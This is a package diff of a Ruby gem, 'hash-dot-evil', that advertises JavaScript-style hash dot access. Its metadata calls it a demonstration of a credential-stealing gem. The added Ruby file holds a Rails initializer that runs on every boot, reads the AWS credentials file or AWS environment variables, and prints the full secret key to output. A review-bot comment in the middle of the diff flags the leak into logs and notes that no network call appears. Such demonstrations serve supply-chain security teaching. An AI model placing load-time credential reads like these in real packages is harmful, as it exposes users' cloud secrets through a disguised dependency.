hash-dot-evil 0.0.1

Files changed (3)
  1. checksums.yaml +7 -0
  2. data/lib/hash-dot-evil.rb +81 -0
  3. metadata +73 -0
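--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+ ---
+ SHA256:
+ metadata.gz: 3224ea4936f27d5b0face3dfd9286680619abd9c904c04eec3c022e563f012ba
+ data.tar.gz: 5092140719f999085c2eddd78843e3c77c9819acb6e109c03e0376c71891e379
+ SHA512:
+ metadata.gz: 5b76f517b4597f4a947c2db99c3b83dcf9e8af8b3f4c7d48e2abe058f54f7189adc6f0d398f0a7e655a9d35472c5302b61beecc9d1c3ebf20fc739fcc604d856
+ data.tar.gz: 0ed00374eddc65cb52e7addbfb7d6fe67c91495e9ad3dd1404443ee1129d7c3ff9c42bb68165f354b00e9378c95c6cee0b1c8ef54c24410e90d6ff1fc8bdd040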
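--- a/data/lib/hash-dot-evil.rb
+++ b/data/lib/hash-dot-evil.rb
@@ -0,0 +1,81 @@
+ class Hash
+ def define_reader(key)
+ define_singleton_method(key.to_sym) do
+ if has_key?(key)
+ return self[key]
+ else
+ return self[key.to_sym]
+ end
+ end
+ end
+
+ def define_writer(key)
+ define_singleton_method(key.to_sym) do |value|
+ self[key[0..-2].to_sym] = value
+ end
+ end
+
+ def method_missing(method, *opts)
+ m = method.to_s
+
+ if m[-1] == '='
+ define_writer(m)
+ return self.send(method, *opts)
+ else
+ define_reader(m)
+ return self.send(method, *opts)
+ end
+ end
+ end
+
+ require 'rails'
+
+ require 'rainbow/refinement'
+ using Rainbow
+
+ class HashDotRailtie < Rails::Railtie
+ initializer "hash-dot-init" do
+ if has_aws_creds_in_file?
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
+ puts "\n\n*******************************************************************************".red.bright
+ puts "*\n* ATTENTION: Your AWS credentials are stored in plain text on your disk!\n*".red.bright
+ puts '*******************************************************************************'.red.bright
+ print_creds(aws_access_key_id, aws_secret_access_key)
+ elsif ENV['AWS_ACCESS_KEY_ID'] && ENV['AWS_SECRET_ACCESS_KEY']
+ print_creds(ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY'])
+ else
+ puts "\n\n*******************************************************************************".green
+ puts "* Good job! I wasn't able to steal your AWS credentials!".green
+ puts '*******************************************************************************'.green
+ end
+ end
+
+ def print_creds(access_key_id, secret_access_key)
+ #puts ''.bg(:yellow)
+ puts "\n\n*********************************************************************************".red.bright
+ puts "*\n* ATTENTION: I could totally steal your AWS credentials right now if I wanted to\n*\n*".red.bright
+ puts "* Your AWS creds are:\n*\n*".red.bright
+ puts "*\t#{access_key_id}".red.bright
+ puts "*\t#{secret_access_key}\n*".red.bright
+ puts '*******************************************************************************'.red.bright
+ puts ''.bg(:yellow)
+ end
+
+ def has_aws_creds_in_file?
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
+ !aws_access_key_id.empty? || !aws_secret_access_key.empty?
+ end
+
+ def extract_aws_creds_from_file
+ aws_creds_file = "#{ENV['HOME']}/.aws/credentials"
+ aws_access_key_id = ''
+ aws_secret_access_key = ''
+ if File.exist?(aws_creds_file)
+ File.read(aws_creds_file).split("\n").each do |line|
+ aws_access_key_id = line.split(' ')[2] if line =~ /aws_access_key_id/
+ aws_secret_access_key = line.split(' ')[2] if line =~ /aws_secret_access_key/
+ end
+ end
+ [aws_access_key_id, aws_secret_access_key]
+ end
+ end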
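Review bot: `print_creds` (new lines 53–62) writes the full secret access key to stdout, and the `hash-dot-init` initializer calls it on every Rails boot, so merely listing this gem in a Gemfile copies a long-lived AWS secret into boot logs and CI output. Nothing in the Hash dot-access code at the top of the file needs `~/.aws/credentials` or the `AWS_*` environment variables, and that mismatch between advertised purpose and load-time file/env reads is what a dependency review should flag. If the gem is kept as a demonstration, it should only show that the credentials were reachable, e.g. `puts "*\t#{access_key_id[0, 4]}… (redacted)".red.bright`, and drop the line that prints `secret_access_key`. The gemspec description speaks of sending credentials to a remote listener; no network call appears in this file, so that part cannot be confirmed from the diff.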
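--- a/metadata
+++ b/metadata
@@ -0,0 +1,73 @@
+ --- !ruby/object:Gem::Specification
+ name: hash-dot-evil
+ version: !ruby/object:Gem::Version
+ version: 0.0.1
+ platform: ruby
+ authors:
+ - Ben Porter
+ autorequire:
+ bindir: bin
+ cert_chain: []
+ date: 2019-03-07 00:00:00.000000000 Z
+ dependencies:
+ - !ruby/object:Gem::Dependency
+ name: rainbow
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ type: :runtime
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ - !ruby/object:Gem::Dependency
+ name: rspec
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ type: :development
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ description: Demonstrates a gem that masquerades as legitimate but steals your AWS
+ credentials and sends them to a remote listener
+ email: BenjaminPorter86@gmail.com
+ executables: []
+ extensions: []
+ extra_rdoc_files: []
+ files:
+ - lib/hash-dot-evil.rb
+ homepage: http://rubygems.org/gems/hash-dot-evil
+ licenses:
+ - MIT
+ metadata: {}
+ post_install_message:
+ rdoc_options: []
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ required_rubygems_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ requirements: []
+ rubyforge_project:
+ rubygems_version: 2.7.6
+ signing_key:
+ specification_version: 4
+ summary: Adds the JavaScript hash syntax to ruby
+ test_files: []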